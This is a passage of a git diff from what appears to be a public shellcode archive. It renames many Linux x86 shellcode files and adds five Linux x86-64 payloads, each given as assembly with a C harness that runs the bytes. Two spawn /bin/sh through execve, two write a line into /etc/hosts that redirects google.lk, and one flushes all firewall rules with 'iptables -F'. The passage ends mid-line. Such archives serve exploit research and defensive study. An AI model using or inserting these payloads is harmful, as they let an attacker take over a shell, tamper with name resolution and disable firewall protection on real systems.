shellcodes/linux_x86-64/42523.c diff --git a/shellcodes/lin_x86-64/42791.c b/shellcodes/linux_x86-64/42791.c similarity index 100% rename from shellcodes/lin_x86-64/42791.c rename to shellcodes/linux_x86-64/42791.c diff --git a/shellcodes/linux_x86-64/43549.c b/shellcodes/linux_x86-64/43549.c new file mode 100644 index 000000000..98ab79b65 --- /dev/null +++ b/shellcodes/linux_x86-64/43549.c @@ -0,0 +1,56 @@ +/* + * Execute /bin/sh - 27 bytes + * Dad` <3 baboon +;rdi 0x4005c4 0x4005c4 +;rsi 0x7fffffffdf40 0x7fffffffdf40 +;rdx 0x0 0x0 +;gdb$ x/s $rdi +;0x4005c4: "/bin/sh" +;gdb$ x/s $rsi +;0x7fffffffdf40: "\304\005@" +;gdb$ x/32xb $rsi +;0x7fffffffdf40: 0xc4 0x05 0x40 0x00 0x00 0x00 0x00 0x00 +;0x7fffffffdf48: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 +;0x7fffffffdf50: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 +;0x7fffffffdf58: 0x55 0xb4 0xa5 0xf7 0xff 0x7f 0x00 0x00 +; +;=> 0x7ffff7aeff20 : mov eax,0x3b +; 0x7ffff7aeff25 : syscall +; + +main: + ;mov rbx, 0x68732f6e69622f2f + ;mov rbx, 0x68732f6e69622fff + ;shr rbx, 0x8 + ;mov rax, 0xdeadbeefcafe1dea + ;mov rbx, 0xdeadbeefcafe1dea + ;mov rcx, 0xdeadbeefcafe1dea + ;mov rdx, 0xdeadbeefcafe1dea + xor eax, eax + mov rbx, 0xFF978CD091969DD1 + neg rbx + push rbx + ;mov rdi, rsp + push rsp + pop rdi + cdq + push rdx + push rdi + ;mov rsi, rsp + push rsp + pop rsi + mov al, 0x3b + syscall + */ + +#include +#include + +char code[] = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"; + +int main() +{ + printf("len:%d bytes\n", strlen(code)); + (*(void(*)()) code)(); + return 0; +} \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43550.c b/shellcodes/linux_x86-64/43550.c new file mode 100644 index 000000000..57474920a --- /dev/null +++ b/shellcodes/linux_x86-64/43550.c @@ -0,0 +1,29 @@ +/* +global _start +section .text +_start: + push 59 + pop rax + cdq + push rdx + mov rbx,0x68732f6e69622f2f + push rbx + push rsp + pop rdi + push rdx + push rdi + push rsp + pop rsi + syscall +*/ + +#include +#include +char code[] = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"; +// char code[] = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"; +int main() +{ + printf("len:%d bytes\n", strlen(code)); + (*(void(*)()) code)(); + return 0; +} \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43551.c b/shellcodes/linux_x86-64/43551.c new file mode 100644 index 000000000..7e2d53b16 --- /dev/null +++ b/shellcodes/linux_x86-64/43551.c @@ -0,0 +1,80 @@ +/* +; Title: Add map in /etc/hosts file - 110 bytes +; Date: 2014-10-29 +; Platform: linux/x86_64 +; Website: http://osandamalith.wordpress.com +; Author: Osanda Malith Jayathissa (@OsandaMalith) + +global _start + section .text + +_start: + ;open + xor rax, rax + add rax, 2 ; open syscall + xor rdi, rdi + xor rsi, rsi + push rsi ; 0x00 + mov r8, 0x2f2f2f2f6374652f ; stsoh/ + mov r10, 0x7374736f682f2f2f ; /cte/ + push r10 + push r8 + add rdi, rsp + xor rsi, rsi + add si, 0x401 + syscall + + ;write + xchg rax, rdi + xor rax, rax + add rax, 1 ; syscall for write + jmp data + +write: + pop rsi + mov dl, 19 ; length in rdx + syscall + + ;close + xor rax, rax + add rax, 3 + syscall + + ;exit + xor rax, rax + mov al, 60 + xor rdi, rdi + syscall + +data: + call write + text db '127.1.1.1 google.lk' +*/ + +#include +#include + +unsigned char code[] = "\x48\x31\xc0\x48\x83\xc0\x02\x48" + "\x31\xff\x48\x31\xf6\x56\x49\xb8" + "\x2f\x65\x74\x63\x2f\x2f\x2f\x2f" + "\x49\xba\x2f\x2f\x2f\x68\x6f\x73" + "\x74\x73\x41\x52\x41\x50\x48\x01" + "\xe7\x48\x31\xf6\x66\x81\xc6\x01" + "\x04\x0f\x05\x48\x97\x48\x31\xc0" + "\x48\x83\xc0\x01\xeb\x18\x5e\xb2" + "\x13\x0f\x05\x48\x31\xc0\x48\x83" + "\xc0\x03\x0f\x05\x48\x31\xc0\xb0" + "\x3c\x48\x31\xff\x0f\x05\xe8\xe3" + "\xff\xff\xff\x31\x32\x37\x2e\x31" + "\x2e\x31\x2e\x31\x20\x67\x6f\x6f" + "\x67\x6c\x65\x2e\x6c\x6b"; + + +int +main() { + printf("Shellcode Length: %d\n", (int)strlen(code)); + int (*ret)() = (int(*)())code; + ret(); + +} +/*EOF*/ \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43552.c b/shellcodes/linux_x86-64/43552.c new file mode 100644 index 000000000..7890bd40c --- /dev/null +++ b/shellcodes/linux_x86-64/43552.c @@ -0,0 +1,56 @@ +/* +global _start + section .text +_start: + ;open + push 2 + pop rax + xor rdi, rdi + push rdi ; 0x00 + mov rbx, 0x7374736f682f2f2f ; ///hosts + push rbx + mov rbx, 0x2f2f2f2f6374652f ; /etc//// + push rbx + push rsp + pop rdi + xor rsi,rsi + mov sil,4 + sal rsi,8 + mov sil,1 + syscall + ;write + push rax + pop rdi + push 1 + pop rax + jmp data +write: + pop rsi + push len ; length in rdx + pop rdx + syscall + ;close + push 3 + pop rax + syscall + ;exit + push 60 + pop rax + xor rdi, rdi + syscall +data: + call write + text db '127.1.1.1 google.lk' + len equ $-text +*/ + +#include +#include +unsigned char code[] = \ +"\x6a\x02\x58\x48\x31\xff\x57\x48\xbb\x2f\x2f\x2f\x68\x6f\x73\x74\x73\x53\x48\xbb\x2f\x65\x74\x63\x2f\x2f\x2f\x2f\x53\x54\x5f\x48\x31\xf6\x40\xb6\x04\x48\xc1\xe6\x08\x40\xb6\x01\x0f\x05\x50\x5f\x6a\x01\x58\xeb\x13\x5e\x6a\x13\x5a\x0f\x05\x6a\x03\x58\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05\xe8\xe8\xff\xff\xff\x31\x32\x37\x2e\x31\x2e\x31\x2e\x31\x20\x67\x6f\x6f\x67\x6c\x65\x2e\x6c\x6b"; +void main() +{ + printf("Shellcode Length: %lu\n", strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +} \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43553.c b/shellcodes/linux_x86-64/43553.c new file mode 100644 index 000000000..97f2d9f0a --- /dev/null +++ b/shellcodes/linux_x86-64/43553.c @@ -0,0 +1,41 @@ +/* +section .text + global _start + +_start: + push 0x3b + pop rax + cdq + push rdx + push word 0x462d + push rsp + pop rcx + + push rdx + mov rbx, 0x73656c6261747069 + push rbx + mov rbx, 0x2f2f2f6e6962732f + push rbx + push rsp + pop rdi + + push rdx + push rcx + push rdi + push rsp + pop rsi + + ; execve("/sbin/iptables", ["/sbin/iptables", "-F"], NULL); + syscall +*/ + +#include +#include +unsigned char code[] = \ +"\x6a\x3b\x58\x99\x52\x66\x68\x2d\x46\x54\x59\x52\x48\xbb\x69\x70\x74\x61\x62\x6c\x65\x73\x53\x48\xbb\x2f\x73\x62\x69\x6e\x2f\x2f\x2f\x53\x54\x5f\x52\x51\x57\x54\x5e\x0f\x05"; +void main() +{ + printf("Shellcode Length: %lu\n", strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +} \ No newline at end of file diff --git a/shellcodes/lin_x86/13307.c b/shellcodes/linux_x86/13307.c similarity index 100% rename from shellcodes/lin_x86/13307.c rename to shellcodes/linux_x86/13307.c diff --git a/shellcodes/lin_x86/13308.c b/shellcodes/linux_x86/13308.c similarity index 100% rename from shellcodes/lin_x86/13308.c rename to shellcodes/linux_x86/13308.c diff --git a/shellcodes/lin_x86/13309.asm b/shellcodes/linux_x86/13309.asm similarity index 100% rename from shellcodes/lin_x86/13309.asm rename to shellcodes/linux_x86/13309.asm diff --git a/shellcodes/lin_x86/13310.c b/shellcodes/linux_x86/13310.c similarity index 100% rename from shellcodes/lin_x86/13310.c rename to shellcodes/linux_x86/13310.c diff --git a/shellcodes/lin_x86/13311.c b/shellcodes/linux_x86/13311.c similarity index 100% rename from shellcodes/lin_x86/13311.c rename to shellcodes/linux_x86/13311.c diff --git a/shellcodes/lin_x86/13312.c b/shellcodes/linux_x86/13312.c similarity index 100% rename from shellcodes/lin_x86/13312.c rename to shellcodes/linux_x86/13312.c diff --git a/shellcodes/lin_x86/13313.c b/shellcodes/linux_x86/13313.c similarity index 100% rename from shellcodes/lin_x86/13313.c rename to shellcodes/linux_x86/13313.c diff --git a/shellcodes/lin_x86/13314.c b/shellcodes/linux_x86/13314.c similarity index 100% rename from shellcodes/lin_x86/13314.c rename to shellcodes/linux_x86/13314.c diff --git a/shellcodes/lin_x86/13315.c b/shellcodes/linux_x86/13315.c similarity index 100% rename from shellcodes/lin_x86/13315.c rename to shellcodes/linux_x86/13315.c diff --git a/shellcodes/lin_x86/13316.c b/shellcodes/linux_x86/13316.c similarity index 100% rename from shellcodes/lin_x86/13316.c rename to shellcodes/linux_x86/13316.c diff --git a/shellcodes/lin_x86/13317.s b/shellcodes/linux_x86/13317.s similarity index 100% rename from shellcodes/lin_x86/13317.s rename to shellcodes/linux_x86/13317.s diff --git a/shellcodes/lin_x86/13318.s b/shellcodes/linux_x86/13318.s similarity index 100% rename from shellcodes/lin_x86/13318.s rename to shellcodes/linux_x86/13318.s diff --git a/shellcodes/lin_x86/13319.s b/shellcodes/linux_x86/13319.s similarity index 100% rename from shellcodes/lin_x86/13319.s rename to shellcodes/linux_x86/13319.s diff --git a/shellcodes/lin_x86/13321.c b/shellcodes/linux_x86/13321.c similarity index 100% rename from shellcodes/lin_x86/13321.c rename to shellcodes/linux_x86/13321.c diff --git a/shellcodes/lin_x86/13322.c b/shellcodes/linux_x86/13322.c similarity index 100% rename from shellcodes/lin_x86/13322.c rename to shellcodes/linux_x86/13322.c diff --git a/shellcodes/lin_x86/13323.c b/shellcodes/linux_x86/13323.c similarity index 100% rename from shellcodes/lin_x86/13323.c rename to shellcodes/linux_x86/13323.c diff --git a/shellcodes/lin_x86/13324.c b/shellcodes/linux_x86/13324.c similarity index 100% rename from shellcodes/lin_x86/13324.c rename to shellcodes/linux_x86/13324.c diff --git a/shellcodes/lin_x86/13325.c b/shellcodes/linux_x86/13325.c similarity index 100% rename from shellcodes/lin_x86/13325.c rename to shellcodes/linux_x86/13325.c diff --git a/shellcodes/lin_x86/13326.c b/shellcodes/linux_x86/13326.c similarity index 100% rename from shellcodes/lin_x86/13326.c rename to shellcodes/linux_x86/13326.c diff --git a/shellcodes/lin_x86/13327.c b/shellcodes/linux_x86/13327.c similarity index 100% rename from shellcodes/lin_x86/13327.c rename to shellcodes/linux_x86/13327.c diff --git a/shellcodes/lin_x86/13329.c b/shellcodes/linux_x86/13329.c similarity index 100% rename from shellcodes/lin_x86/13329.c rename to shellcodes/linux_x86/13329.c diff --git a/shellcodes/lin_x86/13330.c b/shellcodes/linux_x86/13330.c similarity index 100% rename from shellcodes/lin_x86/13330.c rename to shellcodes/linux_x86/13330.c diff --git a/shellcodes/lin_x86/13331.c b/shellcodes/linux_x86/13331.c similarity index 100% rename from shellcodes/lin_x86/13331.c rename to shellcodes/linux_x86/13331.c diff --git a/shellcodes/lin_x86/13332.c b/shellcodes/linux_x86/13332.c similarity index 100% rename from shellcodes/lin_x86/13332.c rename to shellcodes/linux_x86/13332.c diff --git a/shellcodes/lin_x86/13333.txt b/shellcodes/linux_x86/13333.txt similarity index 100% rename from shellcodes/lin_x86/13333.txt rename to shellcodes/linux_x86/13333.txt diff --git a/shellcodes/lin_x86/13334.txt b/shellcodes/linux_x86/13334.txt similarity index 100% rename from shellcodes/lin_x86/13334.txt rename to shellcodes/linux_x86/13334.txt diff --git a/shellcodes/lin_x86/13335.c b/shellcodes/linux_x86/13335.c similarity index 100% rename from shellcodes/lin_x86/13335.c rename to shellcodes/linux_x86/13335.c diff --git a/shellcodes/lin_x86/13336.c b/shellcodes/linux_x86/13336.c similarity index 100% rename from shellcodes/lin_x86/13336.c rename to shellcodes/linux_x86/13336.c diff --git a/shellcodes/lin_x86/13337.c b/shellcodes/linux_x86/13337.c similarity index 100% rename from shellcodes/lin_x86/13337.c rename to shellcodes/linux_x86/13337.c diff --git a/shellcodes/lin_x86/13338.c b/shellcodes/linux_x86/13338.c similarity index 100% rename from shellcodes/lin_x86/13338.c rename to shellcodes/linux_x86/13338.c diff --git a/shellcodes/lin_x86/13339.asm b/shellcodes/linux_x86/13339.asm similarity index 100% rename from shellcodes/lin_x86/13339.asm rename to shellcodes/linux_x86/13339.asm diff --git a/shellcodes/lin_x86/13340.c b/shellcodes/linux_x86/13340.c similarity index 100% rename from shellcodes/lin_x86/13340.c rename to shellcodes/linux_x86/13340.c diff --git a/shellcodes/lin_x86/13341.c b/shellcodes/linux_x86/13341.c similarity index 100% rename from shellcodes/lin_x86/13341.c rename to shellcodes/linux_x86/13341.c diff --git a/shellcodes/lin_x86/13342.c b/shellcodes/linux_x86/13342.c similarity index 100% rename from shellcodes/lin_x86/13342.c rename to shellcodes/linux_x86/13342.c diff --git a/shellcodes/lin_x86/13343.asm b/shellcodes/linux_x86/13343.asm similarity index 100% rename from shellcodes/lin_x86/13343.asm rename to shellcodes/linux_x86/13343.asm diff --git a/shellcodes/lin_x86/13344.c b/shellcodes/linux_x86/13344.c similarity index 100% rename from shellcodes/lin_x86/13344.c rename to shellcodes/linux_x86/13344.c diff --git a/shellcodes/lin_x86/13345.c b/shellcodes/linux_x86/13345.c similarity index 100% rename from shellcodes/lin_x86/13345.c rename to shellcodes/linux_x86/13345.c diff --git a/shellcodes/lin_x86/13346.s b/shellcodes/linux_x86/13346.s similarity index 100% rename from shellcodes/lin_x86/13346.s rename to shellcodes/linux_x86/13346.s diff --git a/shellcodes/lin_x86/13347.c b/shellcodes/linux_x86/13347.c similarity index 100% rename from shellcodes/lin_x86/13347.c rename to shellcodes/linux_x86/13347.c diff --git a/shellcodes/lin_x86/13348.c b/shellcodes/linux_x86/13348.c similarity index 100% rename from shellcodes/lin_x86/13348.c rename to shellcodes/linux_x86/13348.c diff --git a/shellcodes/lin_x86/13349.c b/shellcodes/linux_x86/13349.c similarity index 100% rename from shellcodes/lin_x86/13349.c rename to shellcodes/linux_x86/13349.c diff --git a/shellcodes/lin_x86/13350.c b/shellcodes/linux_x86/13350.c similarity index 100% rename from shellcodes/lin_x86/13350.c rename to shellcodes/linux_x86/13350.c diff --git a/shellcodes/lin_x86/13351.c b/shellcodes/linux_x86/13351.c similarity index 100% rename from shellcodes/lin_x86/13351.c rename to shellcodes/linux_x86/13351.c diff --git a/shellcodes/lin_x86/13352.c b/shellcodes/linux_x86/13352.c similarity index 100% rename from shellcodes/lin_x86/13352.c rename to shellcodes/linux_x86/13352.c diff --git a/shellcodes/lin_x86/13353.c b/shellcodes/linux_x86/13353.c similarity index 100% rename from shellcodes/lin_x86/13353.c rename to shellcodes/linux_x86/13353.c diff --git a/shellcodes/lin_x86/13354.c b/shellcodes/linux_x86/13354.c similarity index 100% rename from shellcodes/lin_x86/13354.c rename to shellcodes/linux_x86/13354.c diff --git a/shellcodes/lin_x86/13355.c b/shellcodes/linux_x86/13355.c similarity index 100% rename from shellcodes/lin_x86/13355.c rename to shellcodes/linux_x86/13355.c diff --git a/shellcodes/lin_x86/13356.c b/shellcodes/linux_x86/13356.c similarity index 100% rename from shellcodes/lin_x86/13356.c rename to shellcodes/linux_x86/13356.c diff --git a/shellcodes/lin_x86/13357.c b/shellcodes/linux_x86/13357.c similarity index 100% rename from shellcodes/lin_x86/13357.c rename to shellcodes/linux_x86/13357.c diff --git a/shellcodes/lin_x86/13358.c b/shellcodes/linux_x86/13358.c similarity index 100% rename from shellcodes/lin_x86/13358.c rename to shellcodes/linux_x86/13358.c diff --git a/shellcodes/lin_x86/13359.c b/shellcodes/linux_x86/13359.c similarity index 100% rename from shellcodes/lin_x86/13359.c rename to shellcodes/linux_x86/13359.c diff --git a/shellcodes/lin_x86/13360.c b/shellcodes/linux_x86/13360.c similarity index 100% rename from shellcodes/lin_x86/13360.c rename to shellcodes/linux_x86/13360.c diff --git a/shellcodes/lin_x86/13361.c b/shellcodes/linux_x86/13361.c similarity index 100% rename from shellcodes/lin_x86/13361.c rename to shellcodes/linux_x86/13361.c diff --git a/shellcodes/lin_x86/13362.c b/shellcodes/linux_x86/13362.c similarity index 100% rename from shellcodes/lin_x86/13362.c rename to shellcodes/linux_x86/13362.c diff --git a/shellcodes/lin_x86/13363.c b/shellcodes/linux_x86/13363.c similarity index 100% rename from shellcodes/lin_x86/13363.c rename to shellcodes/linux_x86/13363.c diff --git a/shellcodes/lin_x86/13365.c b/shellcodes/linux_x86/13365.c similarity index 100% rename from shellcodes/lin_x86/13365.c rename to shellcodes/linux_x86/13365.c diff --git a/shellcodes/lin_x86/13366.txt b/shellcodes/linux_x86/13366.txt similarity index 100% rename from shellcodes/lin_x86/13366.txt rename to shellcodes/linux_x86/13366.txt diff --git a/shellcodes/lin_x86/13367.c b/shellcodes/linux_x86/13367.c similarity index 100% rename from shellcodes/lin_x86/13367.c rename to shellcodes/linux_x86/13367.c diff --git a/shellcodes/lin_x86/13368.c b/shellcodes/linux_x86/13368.c similarity index 100% rename from shellcodes/lin_x86/13368.c rename to shellcodes/linux_x86/13368.c diff --git a/shellcodes/lin_x86/13369.c b/shellcodes/linux_x86/13369.c similarity index 100% rename from shellcodes/lin_x86/13369.c rename to shellcodes/linux_x86/13369.c diff --git a/shellcodes/lin_x86/13370.c b/shellcodes/linux_x86/13370.c similarity index 100% rename from shellcodes/lin_x86/13370.c rename to shellcodes/linux_x86/13370.c diff --git a/shellcodes/lin_x86/13371.c b/shellcodes/linux_x86/13371.c similarity index 100% rename from shellcodes/lin_x86/13371.c rename to shellcodes/linux_x86/13371.c diff --git a/shellcodes/lin_x86/13372.c b/shellcodes/linux_x86/13372.c similarity index 100% rename from shellcodes/lin_x86/13372.c rename to shellcodes/linux_x86/13372.c diff --git a/shellcodes/lin_x86/13373.c b/shellcodes/linux_x86/13373.c similarity index 100% rename from shellcodes/lin_x86/13373.c rename to shellcodes/linux_x86/13373.c diff --git a/shellcodes/lin_x86/13374.c b/shellcodes/linux_x86/13374.c similarity index 100% rename from shellcodes/lin_x86/13374.c rename to shellcodes/linux_x86/13374.c diff --git a/shellcodes/lin_x86/13375.c b/shellcodes/linux_x86/13375.c similarity index 100% rename from shellcodes/lin_x86/13375.c rename to shellcodes/linux_x86/13375.c diff --git a/shellcodes/lin_x86/13376.c b/shellcodes/linux_x86/13376.c similarity index 100% rename from shellcodes/lin_x86/13376.c rename to shellcodes/linux_x86/13376.c diff --git a/shellcodes/lin_x86/13377.c b/shellcodes/linux_x86/13377.c similarity index 100% rename from shellcodes/lin_x86/13377.c rename to shellcodes/linux_x86/13377.c diff --git a/shellcodes/lin_x86/13378.c b/shellcodes/linux_x86/13378.c similarity index 100% rename from shellcodes/lin_x86/13378.c rename to shellcodes/linux_x86/13378.c diff --git a/shellcodes/lin_x86/13379.c b/shellcodes/linux_x86/13379.c similarity index 100% rename from shellcodes/lin_x86/13379.c rename to shellcodes/linux_x86/13379.c diff --git a/shellcodes/lin_x86/13380.c b/shellcodes/linux_x86/13380.c similarity index 100% rename from shellcodes/lin_x86/13380.c rename to shellcodes/linux_x86/13380.c diff --git a/shellcodes/lin_x86/13381.c b/shellcodes/linux_x86/13381.c similarity index 100% rename from shellcodes/lin_x86/13381.c rename to shellcodes/linux_x86/13381.c diff --git a/shellcodes/lin_x86/13382.c b/shellcodes/linux_x86/13382.c similarity index 100% rename from shellcodes/lin_x86/13382.c rename to shellcodes/linux_x86/13382.c diff --git a/shellcodes/lin_x86/13383.c b/shellcodes/linux_x86/13383.c similarity index 100% rename from shellcodes/lin_x86/13383.c rename to shellcodes/linux_x86/13383.c diff --git a/shellcodes/lin_x86/13384.c b/shellcodes/linux_x86/13384.c similarity index 100% rename from shellcodes/lin_x86/13384.c rename to shellcodes/linux_x86/13384.c diff --git a/shellcodes/lin_x86/13385.c b/shellcodes/linux_x86/13385.c similarity index 100% rename from shellcodes/lin_x86/13385.c rename to shellcodes/linux_x86/13385.c diff --git a/shellcodes/lin_x86/13386.c b/shellcodes/linux_x86/13386.c similarity index 100% rename from shellcodes/lin_x86/13386.c rename to shellcodes/linux_x86/13386.c diff --git a/shellcodes/lin_x86/13387.c b/shellcodes/linux_x86/13387.c similarity index 100% rename from shellcodes/lin_x86/13387.c rename to shellcodes/linux_x86/13387.c diff --git a/shellcodes/lin_x86/13388.c b/shellcodes/linux_x86/13388.c similarity index 100% rename from shellcodes/lin_x86/13388.c rename to shellcodes/linux_x86/13388.c diff --git a/shellcodes/lin_x86/13389.c b/shellcodes/linux_x86/13389.c similarity index 100% rename from shellcodes/lin_x86/13389.c rename to shellcodes/linux_x86/13389.c diff --git a/shellcodes/lin_x86/13390.c b/shellcodes/linux_x86/13390.c similarity index 100% rename from shellcodes/lin_x86/13390.c rename to shellcodes/linux_x86/13390.c diff --git a/shellcodes/lin_x86/13391.c b/shellcodes/linux_x86/13391.c similarity index 100% rename from shellcodes/lin_x86/13391.c rename to shellcodes/linux_x86/13391.c diff --git a/shellcodes/lin_x86/13392.c b/shellcodes/linux_x86/13392.c similarity index 100% rename from shellcodes/lin_x86/13392.c rename to shellcodes/linux_x86/13392.c diff --git a/shellcodes/lin_x86/13393.c b/shellcodes/linux_x86/13393.c similarity index 100% rename from shellcodes/lin_x86/13393.c rename to shellcodes/linux_x86/13393.c diff --git a/shellcodes/lin_x86/13394.c b/shellcodes/linux_x86/13394.c similarity index 100% rename from shellcodes/lin_x86/13394.c rename to shellcodes/linux_x86/13394.c diff --git a/shellcodes/lin_x86/13395.c b/shellcodes/linux_x86/13395.c similarity index 100% rename from shellcodes/lin_x86/13395.c rename to shellcodes/linux_x86/13395.c diff --git a/shellcodes/lin_x86/13396.c b/shellcodes/linux_x86/13396.c similarity index 100% rename from shellcodes/lin_x86/13396.c rename to shellcodes/linux_x86/13396.c diff --git a/shellcodes/lin_x86/13397.c b/shellcodes/linux_x86/13397.c similarity index 100% rename from shellcodes/lin_x86/13397.c rename to shellcodes/linux_x86/13397.c diff --git a/shellcodes/lin_x86/13398.c b/shellcodes/linux_x86/13398.c similarity index 100% rename from shellcodes/lin_x86/13398.c rename to shellcodes/linux_x86/13398.c diff --git a/shellcodes/lin_x86/13399.c b/shellcodes/linux_x86/13399.c similarity index 100% rename from shellcodes/lin_x86/13399.c rename to shellcodes/linux_x86/13399.c diff --git a/shellcodes/lin_x86/13400.c b/shellcodes/linux_x86/13400.c similarity index 100% rename from shellcodes/lin_x86/13400.c rename to shellcodes/linux_x86/13400.c diff --git a/shellcodes/lin_x86/13402.c b/shellcodes/linux_x86/13402.c similarity index 100% rename from shellcodes/lin_x86/13402.c rename to shellcodes/linux_x86/13402.c diff --git a/shellcodes/lin_x86/13403.c b/shellcodes/linux_x86/13403.c similarity index 100% rename from shellcodes/lin_x86/13403.c rename to shellcodes/linux_x86/13403.c diff --git a/shellcodes/lin_x86/13404.c b/shellcodes/linux_x86/13404.c similarity index 100% rename from shellcodes/lin_x86/13404.c rename to shellcodes/linux_x86/13404.c diff --git a/shellcodes/lin_x86/13405.c b/shellcodes/linux_x86/13405.c similarity index 100% rename from shellcodes/lin_x86/13405.c rename to shellcodes/linux_x86/13405.c diff --git a/shellcodes/lin_x86/13406.c b/shellcodes/linux_x86/13406.c similarity index 100% rename from shellcodes/lin_x86/13406.c rename to shellcodes/linux_x86/13406.c diff --git a/shellcodes/lin_x86/13407.c b/shellcodes/linux_x86/13407.c similarity index 100% rename from shellcodes/lin_x86/13407.c rename to shellcodes/linux_x86/13407.c diff --git a/shellcodes/lin_x86/13408.c b/shellcodes/linux_x86/13408.c similarity index 100% rename from shellcodes/lin_x86/13408.c rename to shellcodes/linux_x86/13408.c diff --git a/shellcodes/lin_x86/13409.c b/shellcodes/linux_x86/13409.c similarity index 100% rename from shellcodes/lin_x86/13409.c rename to shellcodes/linux_x86/13409.c diff --git a/shellcodes/lin_x86/13410.s b/shellcodes/linux_x86/13410.s similarity index 100% rename from shellcodes/lin_x86/13410.s rename to shellcodes/linux_x86/13410.s diff --git a/shellcodes/lin_x86/13411.c b/shellcodes/linux_x86/13411.c similarity index 100% rename from shellcodes/lin_x86/13411.c rename to shellcodes/linux_x86/13411.c diff --git a/shellcodes/lin_x86/13412.c b/shellcodes/linux_x86/13412.c similarity index 100% rename from shellcodes/lin_x86/13412.c rename to shellcodes/linux_x86/13412.c diff --git a/shellcodes/lin_x86/13413.c b/shellcodes/linux_x86/13413.c similarity index 100% rename from shellcodes/lin_x86/13413.c rename to shellcodes/linux_x86/13413.c diff --git a/shellcodes/lin_x86/13414.c b/shellcodes/linux_x86/13414.c similarity index 100% rename from shellcodes/lin_x86/13414.c rename to shellcodes/linux_x86/13414.c diff --git a/shellcodes/lin_x86/13415.c b/shellcodes/linux_x86/13415.c similarity index 100% rename from shellcodes/lin_x86/13415.c rename to shellcodes/linux_x86/13415.c diff --git a/shellcodes/lin_x86/13416.txt b/shellcodes/linux_x86/13416.txt similarity index 100% rename from shellcodes/lin_x86/13416.txt rename to shellcodes/linux_x86/13416.txt diff --git a/shellcodes/lin_x86/13417.c b/shellcodes/linux_x86/13417.c similarity index 100% rename from shellcodes/lin_x86/13417.c rename to shellcodes/linux_x86/13417.c diff --git a/shellcodes/lin_x86/13418.c b/shellcodes/linux_x86/13418.c similarity index 100% rename from shellcodes/lin_x86/13418.c rename to shellcodes/linux_x86/13418.c diff --git a/shellcodes/lin_x86/13419.c b/shellcodes/linux_x86/13419.c similarity index 100% rename from shellcodes/lin_x86/13419.c rename to shellcodes/linux_x86/13419.c diff --git a/shellcodes/lin_x86/13420.c b/shellcodes/linux_x86/13420.c similarity index 100% rename from shellcodes/lin_x86/13420.c rename to shellcodes/linux_x86/13420.c diff --git a/shellcodes/lin_x86/13421.c b/shellcodes/linux_x86/13421.c similarity index 100% rename from shellcodes/lin_x86/13421.c rename to shellcodes/linux_x86/13421.c diff --git a/shellcodes/lin_x86/13422.c b/shellcodes/linux_x86/13422.c similarity index 100% rename from shellcodes/lin_x86/13422.c rename to shellcodes/linux_x86/13422.c diff --git a/shellcodes/lin_x86/13423.c b/shellcodes/linux_x86/13423.c similarity index 100% rename from shellcodes/lin_x86/13423.c rename to shellcodes/linux_x86/13423.c diff --git a/shellcodes/lin_x86/13424.txt b/shellcodes/linux_x86/13424.txt similarity index 100% rename from shellcodes/lin_x86/13424.txt rename to shellcodes/linux_x86/13424.txt diff --git a/shellcodes/lin_x86/13425.c b/shellcodes/linux_x86/13425.c similarity index 100% rename from shellcodes/lin_x86/13425.c rename to shellcodes/linux_x86/13425.c diff --git a/shellcodes/lin_x86/13426.c b/shellcodes/linux_x86/13426.c similarity index 100% rename from shellcodes/lin_x86/13426.c rename to shellcodes/linux_x86/13426.c diff --git a/shellcodes/lin_x86/13427.c b/shellcodes/linux_x86/13427.c similarity index 100% rename from shellcodes/lin_x86/13427.c rename to shellcodes/linux_x86/13427.c diff --git a/shellcodes/lin_x86/13428.c b/shellcodes/linux_x86/13428.c similarity index 100% rename from shellcodes/lin_x86/13428.c rename to shellcodes/linux_x86/13428.c diff --git a/shellcodes/lin_x86/13429.c b/shellcodes/linux_x86/13429.c similarity index 100% rename from shellcodes/lin_x86/13429.c rename to shellcodes/linux_x86/13429.c diff --git a/shellcodes/lin_x86/13430.c b/shellcodes/linux_x86/13430.c similarity index 100% rename from shellcodes/lin_x86/13430.c rename to shellcodes/linux_x86/13430.c diff --git a/shellcodes/lin_x86/13431.c b/shellcodes/linux_x86/13431.c similarity index 100% rename from shellcodes/lin_x86/13431.c rename to shellcodes/linux_x86/13431.c diff --git a/shellcodes/lin_x86/13432.c b/shellcodes/linux_x86/13432.c similarity index 100% rename from shellcodes/lin_x86/13432.c rename to shellcodes/linux_x86/13432.c diff --git a/shellcodes/lin_x86/13433.c b/shellcodes/linux_x86/13433.c similarity index 100% rename from shellcodes/lin_x86/13433.c rename to shellcodes/linux_x86/13433.c diff --git a/shellcodes/lin_x86/13434.c b/shellcodes/linux_x86/13434.c similarity index 100% rename from shellcodes/lin_x86/13434.c rename to shellcodes/linux_x86/13434.c diff --git a/shellcodes/lin_x86/13435.c b/shellcodes/linux_x86/13435.c similarity index 100% rename from shellcodes/lin_x86/13435.c rename to shellcodes/linux_x86/13435.c diff --git a/shellcodes/lin_x86/13436.c b/shellcodes/linux_x86/13436.c similarity index 100% rename from shellcodes/lin_x86/13436.c rename to shellcodes/linux_x86/13436.c diff --git a/shellcodes/lin_x86/13437.c b/shellcodes/linux_x86/13437.c similarity index 100% rename from shellcodes/lin_x86/13437.c rename to shellcodes/linux_x86/13437.c diff --git a/shellcodes/lin_x86/13438.c b/shellcodes/linux_x86/13438.c similarity index 100% rename from shellcodes/lin_x86/13438.c rename to shellcodes/linux_x86/13438.c diff --git a/shellcodes/lin_x86/13439.c b/shellcodes/linux_x86/13439.c similarity index 100% rename from shellcodes/lin_x86/13439.c rename to shellcodes/linux_x86/13439.c diff --git a/shellcodes/lin_x86/13440.c 